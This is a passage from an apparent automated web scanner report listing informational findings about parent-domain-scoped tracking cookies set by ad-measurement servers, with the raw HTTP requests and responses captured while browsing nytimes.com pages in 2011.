Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:45 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Wed, 12 May 2010 11:39:44 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4_911744-6-1; expires=Mon, 02 Jul 2012 03:39:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E_908257-ON6)M-0; expires=Mon, 02-Jul-2012 03:39:45 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.26. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693344/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:15:54 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-4; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693344/decide.php?ord=1305198953 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-4; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.27. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693345/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_200214693345-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693345/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_200214693345-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.28. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693346/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:15:50 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693346/decide.php?ord=1305198949 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:50 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.29. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912024/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:15:51 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-.66)M-0; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912024/decide.php?ord=1305198950 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-.66)M-0; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.30. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912025/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912025/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.31. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912026/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:27:45 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1_912026-2-1; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-D; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912026/decide.php?ord=1305199664 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-0; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:46 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1_912026-2-1; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-D; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.32. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912027/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 12-May-2010 11:27:24 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615-(E6)M-0; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912027/decide.php?ord=1305199643 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2; LP=1305126639

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:25 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615-(E6)M-0; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.33. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 11:04:16 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

